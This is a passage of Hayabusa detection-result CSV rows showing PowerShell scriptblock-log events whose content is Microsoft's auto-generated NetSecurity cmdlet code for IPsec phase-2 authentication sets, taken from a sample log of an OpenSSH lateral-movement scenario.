[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.561 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEP2AuthSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecPhase2AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecPhase2AuthSet' -Alias '*' function Get-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.561 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,") -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecPhase2AuthSet' -Alias '*' function Set-NetIPsecPhase2AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 